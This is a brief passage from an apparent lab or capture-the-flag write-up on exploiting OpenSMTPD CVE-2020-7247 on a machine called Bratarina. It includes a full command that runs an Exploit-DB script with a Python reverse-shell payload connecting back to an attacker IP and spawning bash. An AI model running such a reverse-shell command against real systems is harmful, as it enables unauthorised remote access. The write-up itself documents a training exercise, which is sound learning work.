Exploitation

According to our scans Bratarina is running OpenSMTPD 2.0 which makes this machine a good candidate for the RCE.

OpenSMTPD 6.6.1 - Remote Code ExecutionExploit Database

GitHub - QTranspose/CVE-2020-7247-exploit: OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution PoC exploitGitHub

In order to get the exploit to work we had to use the principle of using the same thing, just in different ways.

I ran the following command to get a reverse shell.

ython3 /usr/share/exploitdb/exploits/linux/remote/47984.py 192.168.242.71 25 'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.49.242\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"'

I also found this exploit from github which seems to be really good as well.